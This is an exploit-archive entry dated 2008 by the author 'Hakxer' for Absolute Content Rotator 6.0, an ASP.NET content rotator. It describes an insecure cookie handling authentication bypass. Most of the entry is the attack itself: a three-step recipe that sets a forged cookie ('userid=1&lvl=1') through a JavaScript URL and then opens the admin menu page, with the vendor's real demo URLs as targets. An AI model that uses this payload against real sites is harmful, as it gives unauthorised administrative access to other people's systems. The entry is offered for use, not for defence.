id: 3972
date: 10/31/2008
title: Absolute Content Rotator 6.0 Insecure Cookie Handling Vulnerability
author: Hakxer
cves: 

===================================================================
Absolute Content Rotator 6.0 Insecure Cookie Handling Vulnerability
===================================================================


[~] Author : Hakxer
[~] Type Gap : Insecure Cookie Handling
[~] script : Absolute Content Rotator 6.0 [see script] http://www.xigla.com/absolutecr/demo.htm
[~] Team : EgY Coders 
#################################################################################################

Exploit : First go to http://www.xigla.com/absolutecr/demo/login.aspx
Second Execute 
[~] javascript:document.cookie="xlaACRDEMOuser=userid=1&lvl=1&s=";
Now Go to http://www.xigla.com/absolutecr/demo/menu.aspx


--- Proud To Be A Muslim ---

# _=END=_ # 



#  0day.today [2023-03-24]  #